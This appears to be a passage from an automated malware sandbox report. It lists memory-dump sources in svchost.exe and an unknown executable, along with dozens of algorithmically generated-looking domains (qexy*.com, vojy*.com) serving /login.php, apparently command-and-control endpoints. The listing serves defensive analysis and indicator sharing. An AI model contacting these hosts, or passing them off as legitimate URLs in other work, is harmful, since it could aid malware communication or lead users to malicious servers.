00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytav.com/login.php
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2664551045.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetytug.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498635965.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyvep.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiq.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696068911.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1696189199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693423214.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfag.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfuq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhap.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076266061.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076877673.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhul.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708272714.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhuv.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhuv.com/login.phpC:
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykaq.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexylup.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641581464.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641334873.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641752374.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynol.com/login.php
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795088390.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynyp.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynyq.com/login.php
Source: svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078523532.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684758224.0000000005A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqip.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyqog.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1844960136.000000000CCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845988945.000000000CCB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyryl.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565752002.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691597706.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567509191.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565950608.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736287132.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523218130.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyryl.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysev.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/H
Source: svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/http://qegysoq.com/H
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydam.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojydoc.com/
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygut.com/login.php
